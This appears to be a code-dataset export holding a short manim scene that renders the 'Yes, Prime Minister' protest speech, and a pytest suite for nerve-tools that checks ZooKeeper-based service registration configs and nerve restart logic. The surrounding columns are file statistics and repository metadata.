| 0
| 0
| 0
| 0
| 0.096296
| 135
| 5
| 66
| 27
| 0.844262
| 0
| 0
| 0
| 0
| 0
| 0.207407
| 0.207407
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
8728f491f8dad6cb2809e9535c9ba255a7b7ce12
| 1,458
|
py
|
Python
|
jeremy/old/ypm.py
|
sin3000x/manim
|
bd369534d29b962a321153dadacca827e06ec899
|
[
"MIT"
] | null | null | null |
jeremy/old/ypm.py
|
sin3000x/manim
|
bd369534d29b962a321153dadacca827e06ec899
|
[
"MIT"
] | null | null | null |
jeremy/old/ypm.py
|
sin3000x/manim
|
bd369534d29b962a321153dadacca827e06ec899
|
[
"MIT"
] | null | null | null |
"""
Prime Minister, I must protest in the strongest possible terms my profound opposition to a newly instituted practice which imposes severe and intolerable restrictions upon the ingress and egress of senior members of the hierarchy and which will, in all probability, should the current deplorable innovation be perpetuated, precipitate a constriction of the channels of communication, and culminate in a condition of organisational atrophy and administrative paralysis which will render effectively impossible the coherent and co-ordinated discharge of the function of government within Her Majesty's United Kingdom of Great Britain and Northern Ireland.
"""
from manimlib import *
class Lines(Scene):
    """Static scene rendering the 'Yes, Prime Minister' protest sentence
    as one multi-line TexText object."""

    def construct(self):
        # Same sentence as the module docstring, but with manual TeX line
        # breaks (\\) so it lays out as thirteen on-screen lines.
        text = TexText(r"Prime Minister, I must protest in the strongest possible terms \\my profound opposition to a newly instituted practice \\which imposes severe and intolerable restrictions \\upon the ingress and egress of senior members of the hierarchy \\and which will, in all probability, \\should the current deplorable innovation be perpetuated, \\precipitate a constriction of the channels of communication, \\and culminate in a condition of \\organisational atrophy and administrative paralysis \\which will render effectively impossible the coherent \\and co-ordinated discharge of the function of government \\within Her Majesty's United Kingdom of Great Britain \\and Northern Ireland.")
        self.add(text)
| 162
| 704
| 0.807956
| 205
| 1,458
| 5.746341
| 0.4
| 0.025467
| 0.023769
| 0.03056
| 0.938879
| 0.938879
| 0.938879
| 0.938879
| 0.938879
| 0.938879
| 0
| 0
| 0.150206
| 1,458
| 9
| 705
| 162
| 0.950767
| 0.447874
| 0
| 0
| 0
| 0.2
| 0.848371
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.2
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
873663f9dc2a20e820cc7e54b9b280ac84fce32e
| 29,706
|
py
|
Python
|
src/tests/configure_nerve_test.py
|
analogue/nerve-tools
|
1d98ace676ed24fd6a3c3ab5ce77653f0c8eace9
|
[
"Apache-2.0"
] | null | null | null |
src/tests/configure_nerve_test.py
|
analogue/nerve-tools
|
1d98ace676ed24fd6a3c3ab5ce77653f0c8eace9
|
[
"Apache-2.0"
] | null | null | null |
src/tests/configure_nerve_test.py
|
analogue/nerve-tools
|
1d98ace676ed24fd6a3c3ab5ce77653f0c8eace9
|
[
"Apache-2.0"
] | null | null | null |
import copy
import mock
from mock import call
from mock import patch
from mock import mock_open
from mock import MagicMock
from mock import Mock
import pytest
import sys
import multiprocessing
from contextlib import contextmanager
from typing import List
from nerve_tools import configure_nerve
from nerve_tools.configure_nerve import generate_configuration
from nerve_tools.configure_nerve import generate_subconfiguration
try:
    # Sizing constant used by the tests: at least 10, scaled up on hosts
    # with more cores.
    CPUS = max(multiprocessing.cpu_count(), 10)
except NotImplementedError:
    # cpu_count() may be unavailable on some platforms; fall back to 10.
    CPUS = 10
def test_get_named_zookeeper_topology():
    """get_named_zookeeper_topology should open <dir>/<type>/<location>.yaml
    and flatten each [host, port] pair from the YAML into 'host:port'."""
    m = mock_open()
    with patch(
        'nerve_tools.configure_nerve.open',
        m, create=True
    ), patch(
        'yaml.load', return_value=[['foo', 42]]
    ):
        zk_topology = configure_nerve.get_named_zookeeper_topology(
            'test-type', 'test-location', '/fake/path/'
        )
        assert zk_topology == ['foo:42']
        # Verify the yaml path was assembled from type + location.
        m.assert_called_with(
            '/fake/path/test-type/test-location.yaml'
        )
def get_labels_by_service_and_port(service: str, port: int, labels_dir):
    """Test stub: only ('test_service', 1234) has labels; anything else
    resolves to an empty mapping. labels_dir is accepted but ignored."""
    if (service, port) != ('test_service', 1234):
        return {}
    return {'label1': 'value1', 'label2': 'value2'}
def get_current_location(typ: str) -> str:
    """Test stub mapping each location type to a fixed 'my_*' value;
    raises KeyError for unknown types."""
    locations = {
        'ecosystem': 'my_ecosystem',
        'superregion': 'my_superregion',
        'habitat': 'my_habitat',
        'region': 'my_region',
    }
    return locations[typ]
def convert_location_type(src_loc: str, src_typ: str, dst_typ: str) -> List[str]:
    """Test stub for location-type conversion.

    Identity when source and destination types match; otherwise a fixed
    lookup table (KeyError on combinations the tests never use).
    """
    if src_typ == dst_typ:
        return [src_loc]
    conversions = {
        ('my_superregion', 'superregion', 'superregion'): ['my_superregion'],
        ('another_superregion', 'superregion', 'region'): ['another_region'],
        ('my_region', 'region', 'superregion'): ['my_superregion'],
        ('another_region', 'region', 'region'): ['another_region'],
        ('another_region', 'region', 'superregion'): ['another_superregion'],
    }
    return conversions[(src_loc, src_typ, dst_typ)]
def get_named_zookeeper_topology(cluster_type, cluster_location, zk_topology_dir):
    """Test stub: fixed ZooKeeper host lists for the two 'infrastructure'
    clusters; KeyError otherwise. zk_topology_dir is accepted but ignored."""
    hosts_by_cluster = {
        ('infrastructure', 'my_superregion'): ['1.2.3.4', '2.3.4.5'],
        ('infrastructure', 'another_superregion'): ['3.4.5.6', '4.5.6.7'],
    }
    return hosts_by_cluster[(cluster_type, cluster_location)]
@pytest.fixture
def expected_sub_config():
    """Expected nerve subconfiguration for 'test_service' on host 10.0.0.1,
    port 1234: one smartstack (v2.new) entry per ZK superregion, each with a
    local hacheck HTTP check on port 6666 and location/paasta labels."""
    expected_config = {
        'test_service.my_superregion:10.0.0.1.1234.v2.new': {
            'zk_hosts': ['1.2.3.4', '2.3.4.5'],
            'zk_path': '/smartstack/global/test_service',
            'checks': [{
                'rise': 1,
                'uri': '/http/test_service/1234/status',
                'host': '127.0.0.1',
                'timeout': 2.0,
                'open_timeout': 2.0,
                'fall': 2,
                'type': 'http',
                'port': 6666,
                'headers': {},
            }],
            'host': '10.0.0.1',
            'check_interval': 3.0,
            'port': 1234,
            # Placeholder: the tests only care that the weight is passed
            # through unchanged.
            'weight': mock.sentinel.weight,
            'labels': {
                'label1': 'value1',
                'label2': 'value2',
                'superregion:my_superregion': '',
                'region:my_region': '',
                'deploy_group': 'prod.canary',
                'paasta_instance': 'canary',
            },
        },
        # The remote superregion entry: different ZK ensemble, and only a
        # region label (no superregion:... label for the local superregion).
        'test_service.another_superregion:10.0.0.1.1234.v2.new': {
            'zk_hosts': ['3.4.5.6', '4.5.6.7'],
            'zk_path': '/smartstack/global/test_service',
            'checks': [{
                'rise': 1,
                'uri': '/http/test_service/1234/status',
                'host': '127.0.0.1',
                'timeout': 2.0,
                'open_timeout': 2.0,
                'fall': 2,
                'type': 'http',
                'port': 6666,
                'headers': {},
            }],
            'host': '10.0.0.1',
            'check_interval': 3.0,
            'port': 1234,
            'weight': mock.sentinel.weight,
            'labels': {
                'label1': 'value1',
                'label2': 'value2',
                'region:another_region': '',
                'deploy_group': 'prod.canary',
                'paasta_instance': 'canary',
            },
        },
    }
    return expected_config
@pytest.fixture
def expected_sub_config_with_envoy_ingress_listeners(expected_sub_config):
    """Expected nerve config when envoy ingress listeners are configured.

    Starts from expected_sub_config, rewrites the smartstack entries to the
    k8s pod IP, then adds full-mesh envoy registrations for the same service.
    """
    # Convert smartstack mesos services to smartstack k8s services
    for k, v in expected_sub_config.items():
        expected_sub_config[k]['host'] = '10.4.5.6'
    new_expected_sub_config = {}
    for k, v in expected_sub_config.items():
        # Registration keys embed the host IP; rewrite them to the pod IP.
        new_expected_sub_config[k.replace('10.0.0.1', '10.4.5.6')] = expected_sub_config[k]
    # Add in full mesh envoy configs for the same service
    new_expected_sub_config.update({
        'test_service.my_superregion:10.4.5.6.1234': {
            'zk_hosts': ['1.2.3.4', '2.3.4.5'],
            'zk_path': '/envoy/global/test_service',
            'checks': [{
                'rise': 1,
                'uri': '/https/test_service/35000/status',
                'host': '10.0.0.1',
                'timeout': 2.0,
                'open_timeout': 2.0,
                'fall': 2,
                'type': 'http',
                'port': 6666,
                'headers': {'Host': 'test_service'},
            }],
            'host': '10.0.0.1',
            'check_interval': 3.0,
            'port': 35000,
            'weight': mock.sentinel.weight,
            'labels': {
                'label1': 'value1',
                'label2': 'value2',
                'superregion:my_superregion': '',
                'region:my_region': '',
                'deploy_group': 'prod.canary',
                'paasta_instance': 'canary',
            },
        },
        'test_service.another_superregion:10.4.5.6.1234': {
            'zk_hosts': ['3.4.5.6', '4.5.6.7'],
            'zk_path': '/envoy/global/test_service',
            'checks': [{
                'rise': 1,
                'uri': '/https/test_service/35000/status',
                'host': '10.0.0.1',
                'timeout': 2.0,
                'open_timeout': 2.0,
                'fall': 2,
                'type': 'http',
                'port': 6666,
                'headers': {'Host': 'test_service'},
            }],
            'host': '10.0.0.1',
            'check_interval': 3.0,
            'port': 35000,
            'weight': mock.sentinel.weight,
            'labels': {
                'label1': 'value1',
                'label2': 'value2',
                'region:another_region': '',
                'deploy_group': 'prod.canary',
                'paasta_instance': 'canary',
            },
        },
    })
    return new_expected_sub_config
def test_generate_subconfiguration(expected_sub_config):
    """generate_subconfiguration emits the expected smartstack registrations
    for a plain (non-k8s, non-envoy) service."""
    with patch(
        'nerve_tools.configure_nerve.get_current_location',
        side_effect=get_current_location
    ), patch(
        'nerve_tools.configure_nerve.convert_location_type',
        side_effect=convert_location_type
    ), patch(
        'nerve_tools.configure_nerve.get_named_zookeeper_topology',
        side_effect=get_named_zookeeper_topology
    ), patch(
        'nerve_tools.configure_nerve.get_labels_by_service_and_port',
        side_effect=get_labels_by_service_and_port
    ):
        mock_service_info = {
            'port': 1234,
            'routes': [('remote_location', 'local_location')],
            'healthcheck_timeout_s': 2.0,
            'healthcheck_mode': 'http',
            'healthcheck_port': 1234,
            'advertise': ['region', 'superregion'],
            'extra_advertise': [
                ('habitat:my_habitat', 'region:another_region'),
                ('habitat:your_habitat', 'region:another_region'),  # Ignored
            ],
            'deploy_group': 'prod.canary',
            'paasta_instance': 'canary',
        }
        actual_config = configure_nerve.generate_subconfiguration(
            service_name='test_service',
            service_info=mock_service_info,
            host_ip='10.0.0.1',
            hacheck_port=6666,
            weight=mock.sentinel.weight,
            zk_topology_dir='/fake/path',
            zk_location_type='superregion',
            zk_cluster_type='infrastructure',
            labels_dir='/dev/null',
            envoy_service_info=None,
        )
        assert expected_sub_config == actual_config
def test_generate_subconfiguration_k8s(expected_sub_config):
    """When service_ip/hacheck_ip are provided (k8s pod), registrations use
    the pod IP and health checks target the hacheck sidecar IP."""
    with patch(
        'nerve_tools.configure_nerve.get_current_location',
        side_effect=get_current_location
    ), patch(
        'nerve_tools.configure_nerve.convert_location_type',
        side_effect=convert_location_type
    ), patch(
        'nerve_tools.configure_nerve.get_named_zookeeper_topology',
        side_effect=get_named_zookeeper_topology
    ), patch(
        'nerve_tools.configure_nerve.get_labels_by_service_and_port',
        side_effect=get_labels_by_service_and_port
    ):
        # Adjust the baseline expectation: host becomes the pod IP and
        # checks go to the hacheck sidecar.
        for k, v in expected_sub_config.items():
            expected_sub_config[k]['host'] = '10.4.5.6'
            for check in expected_sub_config[k]['checks']:
                check['host'] = '10.1.2.3'
        new_expected_sub_config = {}
        for k, v in expected_sub_config.items():
            # Registration keys embed the IP; rewrite them to the pod IP.
            new_expected_sub_config[k.replace('10.0.0.1', '10.4.5.6')] = expected_sub_config[k]
        mock_service_info = {
            'port': 1234,
            'routes': [('remote_location', 'local_location')],
            'healthcheck_timeout_s': 2.0,
            'healthcheck_mode': 'http',
            'healthcheck_port': 1234,
            'hacheck_ip': '10.1.2.3',
            'service_ip': '10.4.5.6',
            'advertise': ['region', 'superregion'],
            'extra_advertise': [
                ('habitat:my_habitat', 'region:another_region'),
                ('habitat:your_habitat', 'region:another_region'),  # Ignored
            ],
            'deploy_group': 'prod.canary',
            'paasta_instance': 'canary',
        }
        actual_config = configure_nerve.generate_subconfiguration(
            service_name='test_service',
            service_info=mock_service_info,
            host_ip='10.4.5.6',
            hacheck_port=6666,
            weight=mock.sentinel.weight,
            zk_topology_dir='/fake/path',
            zk_location_type='superregion',
            zk_cluster_type='infrastructure',
            labels_dir='/dev/null',
            envoy_service_info=None,
        )
        assert new_expected_sub_config == actual_config
def test_generate_subconfiguration_with_envoy_ingress_listeners(
    expected_sub_config_with_envoy_ingress_listeners
):
    """Passing envoy_service_info adds full-mesh envoy registrations on top
    of the regular smartstack registrations."""
    with patch(
        'nerve_tools.configure_nerve.get_current_location',
        side_effect=get_current_location
    ), patch(
        'nerve_tools.configure_nerve.convert_location_type',
        side_effect=convert_location_type
    ), patch(
        'nerve_tools.configure_nerve.get_named_zookeeper_topology',
        side_effect=get_named_zookeeper_topology
    ), patch(
        'nerve_tools.configure_nerve.get_labels_by_service_and_port',
        side_effect=get_labels_by_service_and_port
    ), patch(
        'nerve_tools.configure_nerve.get_host_ip',
        return_value='10.0.0.1',
    ), patch(
        'nerve_tools.envoy.get_host_ip',
        return_value='10.0.0.1',
    ):
        mock_service_info = {
            'port': 1234,
            'routes': [('remote_location', 'local_location')],
            'healthcheck_timeout_s': 2.0,
            'healthcheck_mode': 'http',
            'healthcheck_port': 1234,
            'advertise': ['region', 'superregion'],
            'extra_advertise': [
                ('habitat:my_habitat', 'region:another_region'),
                ('habitat:your_habitat', 'region:another_region'),  # Ignored
            ],
            'deploy_group': 'prod.canary',
            'paasta_instance': 'canary',
            'service_ip': '10.4.5.6',
        }
        # The envoy variant of the service listens on the ingress port and
        # requires a Host header for health checks.
        mock_envoy_service_info = copy.deepcopy(mock_service_info)
        mock_envoy_service_info.update({
            'port': 35000,
            'healthcheck_port': 35000,
            'extra_healthcheck_headers': {'Host': 'test_service'},
        })
        actual_config = generate_subconfiguration(
            service_name='test_service',
            service_info=mock_service_info,
            host_ip='10.0.0.1',
            hacheck_port=6666,
            weight=mock.sentinel.weight,
            zk_topology_dir='/fake/path',
            zk_location_type='superregion',
            zk_cluster_type='infrastructure',
            labels_dir='/dev/null',
            envoy_service_info=mock_envoy_service_info,
        )
        assert expected_sub_config_with_envoy_ingress_listeners == actual_config
def test_generate_configuration_paasta_service():
    """generate_configuration wraps each paasta service's subconfiguration
    in the top-level nerve config skeleton."""
    expected_config = {
        'instance_id': 'my_host',
        'services': {
            'foo': 17,
        },
        'heartbeat_path': 'test'
    }
    with patch(
        'nerve_tools.configure_nerve.get_host_ip',
        return_value='ip_address'
    ), patch(
        'nerve_tools.configure_nerve.get_hostname',
        return_value='my_host'
    ), patch(
        'nerve_tools.configure_nerve.generate_subconfiguration',
        return_value={'foo': 17}
    ) as mock_generate_subconfiguration:
        mock_service_info = {
            'port': 1234,
            'healthcheck_timeout_s': 2.0,
            'advertise': ['region'],
            'extra_advertise': [('habitat:my_habitat', 'region:another_region')],
        }
        actual_config = configure_nerve.generate_configuration(
            paasta_services=[(
                'test_service',
                mock_service_info,
            )],
            puppet_services=[],
            heartbeat_path='test',
            hacheck_port=6666,
            weight=mock.sentinel.classic_weight,
            zk_topology_dir='/fake/path',
            zk_location_type='fake_zk_location_type',
            zk_cluster_type='fake_cluster_type',
            labels_dir='/dev/null',
            envoy_ingress_listeners={},
        )
        # NOTE(review): weight=10 here (not the sentinel passed above) —
        # presumably paasta services get a fixed weight; verify against
        # generate_configuration's implementation.
        mock_generate_subconfiguration.assert_called_once_with(
            service_name='test_service',
            service_info=mock_service_info,
            host_ip='ip_address',
            hacheck_port=6666,
            weight=10,
            zk_topology_dir='/fake/path',
            zk_location_type='fake_zk_location_type',
            zk_cluster_type='fake_cluster_type',
            labels_dir='/dev/null',
            envoy_service_info=None,
        )
    assert expected_config == actual_config
def test_generate_configuration_paasta_service_with_envoy_ingress_listeners():
    """When envoy ingress listeners exist for a (service, port) pair,
    generate_configuration passes a derived envoy_service_info through to
    generate_subconfiguration for each service instance."""
    expected_config = {
        'instance_id': 'my_host',
        'services': {
            'foo': 17,
        },
        'heartbeat_path': 'test'
    }
    with patch(
        'nerve_tools.configure_nerve.get_host_ip',
        return_value='ip_address',
    ), patch(
        'nerve_tools.envoy.get_host_ip',
        return_value='ip_address',
    ), patch(
        'nerve_tools.configure_nerve.get_hostname',
        return_value='my_host',
    ), patch(
        'nerve_tools.configure_nerve.generate_subconfiguration',
        return_value={'foo': 17}
    ) as mock_generate_subconfiguration:
        mock_service_info = {
            'port': 1234,
            'healthcheck_timeout_s': 2.0,
            'advertise': ['region'],
            'extra_advertise': [('habitat:my_habitat', 'region:another_region')],
        }
        # Both instances share the same ingress listener port.
        envoy_ingress_listeners = {
            ('test_service.main', 1234): 35001,
            ('test_service.alt', 1234): 35001,
        }
        # Expected envoy variants: ingress port substituted and a Host
        # header added per instance name.
        mock_envoy_service_main_info = copy.deepcopy(mock_service_info)
        mock_envoy_service_main_info.update({
            'host': 'ip_address',
            'port': 35001,
            'healthcheck_port': 35001,
            'extra_healthcheck_headers': {'Host': 'test_service.main'},
        })
        mock_envoy_service_alt_info = copy.deepcopy(mock_service_info)
        mock_envoy_service_alt_info.update({
            'host': 'ip_address',
            'port': 35001,
            'healthcheck_port': 35001,
            'extra_healthcheck_headers': {'Host': 'test_service.alt'},
        })
        actual_config = generate_configuration(
            paasta_services=[
                (
                    'test_service.main',
                    mock_service_info,
                ),
                (
                    'test_service.alt',
                    mock_service_info,
                )
            ],
            puppet_services=[],
            heartbeat_path='test',
            hacheck_port=6666,
            weight=mock.sentinel.classic_weight,
            zk_topology_dir='/fake/path',
            zk_location_type='fake_zk_location_type',
            zk_cluster_type='fake_cluster_type',
            labels_dir='/dev/null',
            envoy_ingress_listeners=envoy_ingress_listeners,
        )
        mock_generate_subconfiguration.assert_has_calls([
            call(
                service_name='test_service.main',
                service_info=mock_service_info,
                host_ip='ip_address',
                hacheck_port=6666,
                weight=10,
                zk_topology_dir='/fake/path',
                zk_location_type='fake_zk_location_type',
                zk_cluster_type='fake_cluster_type',
                labels_dir='/dev/null',
                envoy_service_info=mock_envoy_service_main_info,
            ),
            call(
                service_name='test_service.alt',
                service_info=mock_service_info,
                host_ip='ip_address',
                hacheck_port=6666,
                weight=10,
                zk_topology_dir='/fake/path',
                zk_location_type='fake_zk_location_type',
                zk_cluster_type='fake_cluster_type',
                labels_dir='/dev/null',
                envoy_service_info=mock_envoy_service_alt_info,
            )
        ])
    assert expected_config == actual_config
def test_generate_configuration_healthcheck_port():
    """An explicit healthcheck_port in service_info is passed through
    unchanged to generate_subconfiguration."""
    expected_config = {
        'instance_id': 'my_host',
        'services': {
            'foo': 17,
        },
        'heartbeat_path': 'test'
    }
    with patch(
        'nerve_tools.configure_nerve.get_host_ip',
        return_value='ip_address'
    ), patch(
        'nerve_tools.configure_nerve.get_hostname',
        return_value='my_host'
    ), patch(
        'nerve_tools.configure_nerve.generate_subconfiguration',
        return_value={'foo': 17}
    ) as mock_generate_subconfiguration:
        mock_service_info = {
            'port': 1234,
            'routes': [('remote_location', 'local_location')],
            'healthcheck_timeout_s': 2.0,
            'healthcheck_port': 7890,  # differs from the service port
            'advertise': ['region'],
            'extra_advertise': [('habitat:my_habitat', 'region:another_region')],
        }
        actual_config = configure_nerve.generate_configuration(
            paasta_services=[(
                'test_service',
                mock_service_info,
            )],
            puppet_services=[],
            heartbeat_path='test',
            hacheck_port=6666,
            weight=mock.sentinel.classic_weight,
            zk_topology_dir='/fake/path',
            zk_location_type='fake_zk_location_type',
            zk_cluster_type='fake_cluster_type',
            labels_dir='/dev/null',
            envoy_ingress_listeners={},
        )
        mock_generate_subconfiguration.assert_called_once_with(
            service_name='test_service',
            service_info=mock_service_info,
            host_ip='ip_address',
            hacheck_port=6666,
            weight=10,
            zk_topology_dir='/fake/path',
            zk_location_type='fake_zk_location_type',
            zk_cluster_type='fake_cluster_type',
            labels_dir='/dev/null',
            envoy_service_info=None,
        )
    assert expected_config == actual_config
def test_generate_configuration_healthcheck_mode():
    """A non-default healthcheck_mode ('tcp') in service_info is passed
    through unchanged to generate_subconfiguration."""
    expected_config = {
        'instance_id': 'my_host',
        'services': {
            'foo': 17,
        },
        'heartbeat_path': 'test'
    }
    with patch(
        'nerve_tools.configure_nerve.get_host_ip',
        return_value='ip_address'
    ), patch(
        'nerve_tools.configure_nerve.get_hostname',
        return_value='my_host'
    ), patch(
        'nerve_tools.configure_nerve.generate_subconfiguration',
        return_value={'foo': 17}
    ) as mock_generate_subconfiguration:
        mock_service_info = {
            'port': 1234,
            'routes': [('remote_location', 'local_location')],
            'healthcheck_timeout_s': 2.0,
            'healthcheck_mode': 'tcp',
            'healthcheck_port': 7890,
            'advertise': ['region'],
            'extra_advertise': [('habitat:my_habitat', 'region:another_region')],
        }
        actual_config = configure_nerve.generate_configuration(
            paasta_services=[(
                'test_service',
                mock_service_info,
            )],
            puppet_services=[],
            heartbeat_path='test',
            hacheck_port=6666,
            weight=mock.sentinel.classic_weight,
            zk_topology_dir='/fake/path',
            zk_location_type='fake_zk_location_type',
            zk_cluster_type='fake_cluster_type',
            labels_dir='/dev/null',
            envoy_ingress_listeners={},
        )
        mock_generate_subconfiguration.assert_called_once_with(
            service_name='test_service',
            service_info=mock_service_info,
            host_ip='ip_address',
            hacheck_port=6666,
            weight=10,
            zk_topology_dir='/fake/path',
            zk_location_type='fake_zk_location_type',
            zk_cluster_type='fake_cluster_type',
            labels_dir='/dev/null',
            envoy_service_info=None,
        )
    assert expected_config == actual_config
def test_generate_configuration_empty():
    """With no services at all, only the skeleton configuration is built."""
    with patch(
        'nerve_tools.configure_nerve.get_host_ip',
        return_value='ip_address'
    ), patch(
        'nerve_tools.configure_nerve.get_hostname',
        return_value='my_host'
    ):
        configuration = configure_nerve.generate_configuration(
            paasta_services=[],
            puppet_services=[],
            heartbeat_path="",
            hacheck_port=6666,
            weight=mock.sentinel.classic_weight,
            zk_topology_dir='/fake/path',
            zk_location_type='fake_zk_location_type',
            zk_cluster_type='fake_cluster_type',
            labels_dir='/dev/null',
            envoy_ingress_listeners={},
        )
    assert configuration == {'instance_id': 'my_host', 'services': {}, 'heartbeat_path': ''}
@contextmanager
def setup_mocks_for_main():
    """Patch everything configure_nerve.main() touches and yield the mocks.

    Yields:
        Tuple of (mock_sys, mock_file_cmp, mock_move, mock_subprocess_call,
        mock_subprocess_check_call, mock_sleep, mock_file_not_modified).

    Note: the original version pre-assigned throwaway Mock()/MagicMock()
    objects to these names before the `with` block; those assignments were
    dead code (immediately overwritten by the `as` bindings) and have been
    removed.
    """
    with patch.object(
        sys, 'argv', ['configure-nerve']
    ) as mock_sys, patch(
        'nerve_tools.configure_nerve.get_marathon_services_running_here_for_nerve'
    ), patch(
        'nerve_tools.configure_nerve.get_paasta_native_services_running_here_for_nerve'
    ), patch(
        'nerve_tools.configure_nerve.generate_configuration'
    ), patch(
        'nerve_tools.configure_nerve.open', create=True
    ), patch(
        'json.dump'
    ), patch(
        'os.chmod'
    ), patch(
        'filecmp.cmp'
    ) as mock_file_cmp, patch(
        'shutil.move'
    ) as mock_move, patch(
        'subprocess.call'
    ) as mock_subprocess_call, patch(
        'subprocess.check_call'
    ) as mock_subprocess_check_call, patch(
        'time.sleep'
    ) as mock_sleep, patch(
        'nerve_tools.configure_nerve.file_not_modified_since', return_value=False
    ) as mock_file_not_modified:
        yield (
            mock_sys, mock_file_cmp, mock_move,
            mock_subprocess_call, mock_subprocess_check_call, mock_sleep,
            mock_file_not_modified,
        )
def test_file_not_modified_since():
    """A file whose mtime is newer than the mocked clock counts as modified.

    The original version only printed the result and asserted nothing; it
    could never fail. It now asserts the returned value.
    """
    fake_threshold = 10
    fake_path = '/somepath'
    with patch(
        'time.time'
    ) as mock_time, patch(
        'os.path.isfile', return_value=True
    ), patch(
        'os.path.getmtime',
    ) as mock_getmtime:
        mock_time.return_value = 10.0
        # mtime is ahead of the mocked clock, so the file was definitely
        # modified within the threshold window.
        mock_getmtime.return_value = mock_time.return_value + fake_threshold + 1
        # NOTE(review): expecting False (file HAS been modified recently) —
        # confirm against file_not_modified_since's implementation.
        assert not configure_nerve.file_not_modified_since(fake_path, fake_threshold)
def test_nerve_restarted_when_config_files_differ():
    """A changed config is validated, installed, and nerve is restarted
    (with nerve-backup covering the restart window)."""
    with setup_mocks_for_main() as (
        mock_sys, mock_file_cmp, mock_move,
        mock_subprocess_call, mock_subprocess_check_call, mock_sleep, mock_file_not_modified):
        # New and existing nerve configs differ
        mock_file_cmp.return_value = False
        configure_nerve.main()
        # The validated tmp config is moved into place exactly once.
        expected_move = call('/etc/nerve/nerve.conf.json.tmp', '/etc/nerve/nerve.conf.json')
        assert mock_move.call_args_list == [expected_move]
        expected_subprocess_calls = (
            call(['service', 'nerve-backup', 'start']),
            call(['service', 'nerve-backup', 'stop']),
        )
        expected_subprocess_check_calls = (
            call(['service', 'nerve', 'start']),
            call(['service', 'nerve', 'stop']),
            call(['/usr/bin/nerve', '-c', '/etc/nerve/nerve.conf.json.tmp', '-k'])
        )
        actual_subprocess_calls = mock_subprocess_call.call_args_list
        actual_subprocess_check_calls = mock_subprocess_check_call.call_args_list
        # Order-insensitive comparison: check counts plus membership.
        assert len(expected_subprocess_calls) == len(actual_subprocess_calls)
        assert len(expected_subprocess_check_calls) == len(actual_subprocess_check_calls)
        assert all(
            [i in actual_subprocess_calls for i in expected_subprocess_calls]
        )
        assert all(
            [i in actual_subprocess_check_calls for i in expected_subprocess_check_calls]
        )
        mock_sleep.assert_called_with(30)
def test_nerve_not_restarted_when_configs_files_are_identical():
    """An unchanged config is still validated and moved into place, but no
    service restart or sleep occurs."""
    with setup_mocks_for_main() as (
        mock_sys, mock_file_cmp, mock_move,
        mock_subprocess_call, mock_subprocess_check_call, mock_sleep, mock_file_not_modified):
        # New and existing nerve configs are identical
        mock_file_cmp.return_value = True
        configure_nerve.main()
        expected_move = call('/etc/nerve/nerve.conf.json.tmp', '/etc/nerve/nerve.conf.json')
        assert mock_move.call_args_list == [expected_move]
        # Only the config validation run is expected; no service commands.
        expected_subprocess_check_calls = [
            call(['/usr/bin/nerve', '-c', '/etc/nerve/nerve.conf.json.tmp', '-k'])
        ]
        actual_subprocess_calls = mock_subprocess_call.call_args_list
        actual_subprocess_check_calls = mock_subprocess_check_call.call_args_list
        assert len(actual_subprocess_calls) == 0
        assert expected_subprocess_check_calls == actual_subprocess_check_calls
        assert not mock_sleep.called
def test_nerve_restarted_when_heartbeat_file_stale():
    """Even with identical configs, a stale heartbeat file forces a full
    nerve restart (with nerve-backup covering the window)."""
    with setup_mocks_for_main() as (
        mock_sys, mock_file_cmp, mock_move,
        mock_subprocess_call, mock_subprocess_check_call, mock_sleep, mock_file_not_modified):
        # New and existing nerve configs are identical
        mock_file_cmp.return_value = True
        # ...but the heartbeat file has not been touched recently.
        mock_file_not_modified.return_value = True
        configure_nerve.main()
        expected_move = call('/etc/nerve/nerve.conf.json.tmp', '/etc/nerve/nerve.conf.json')
        assert mock_move.call_args_list == [expected_move]
        expected_subprocess_calls = (
            call(['service', 'nerve-backup', 'start']),
            call(['service', 'nerve-backup', 'stop']),
        )
        expected_subprocess_check_calls = (
            call(['service', 'nerve', 'start']),
            call(['service', 'nerve', 'stop']),
            call(['/usr/bin/nerve', '-c', '/etc/nerve/nerve.conf.json.tmp', '-k'])
        )
        actual_subprocess_calls = mock_subprocess_call.call_args_list
        actual_subprocess_check_calls = mock_subprocess_check_call.call_args_list
        # Order-insensitive comparison: check counts plus membership.
        assert len(expected_subprocess_calls) == len(actual_subprocess_calls)
        assert len(expected_subprocess_check_calls) == len(actual_subprocess_check_calls)
        assert all(
            [i in actual_subprocess_calls for i in expected_subprocess_calls]
        )
        assert all(
            [i in actual_subprocess_check_calls for i in expected_subprocess_check_calls]
        )
        mock_sleep.assert_called_with(30)
def test_nerve_not_restarted_when_heartbeat_file_valid():
    """With identical configs and a fresh heartbeat file (the fixture's
    default file_not_modified_since=False), nerve is not restarted."""
    with setup_mocks_for_main() as (
        mock_sys, mock_file_cmp, mock_move,
        mock_subprocess_call, mock_subprocess_check_call, mock_sleep, mock_file_not_modified):
        # New and existing nerve configs are identical
        mock_file_cmp.return_value = True
        configure_nerve.main()
        expected_move = call('/etc/nerve/nerve.conf.json.tmp', '/etc/nerve/nerve.conf.json')
        assert mock_move.call_args_list == [expected_move]
        # Only the config validation run; no service start/stop commands.
        expected_subprocess_check_calls = [
            call(['/usr/bin/nerve', '-c', '/etc/nerve/nerve.conf.json.tmp', '-k'])
        ]
        actual_subprocess_calls = mock_subprocess_call.call_args_list
        actual_subprocess_check_calls = mock_subprocess_check_call.call_args_list
        assert len(actual_subprocess_calls) == 0
        assert expected_subprocess_check_calls == actual_subprocess_check_calls
        assert not mock_sleep.called
| 34.582072
| 98
| 0.590958
| 3,223
| 29,706
| 5.054608
| 0.071983
| 0.042109
| 0.04082
| 0.051562
| 0.84249
| 0.821128
| 0.792708
| 0.772512
| 0.765822
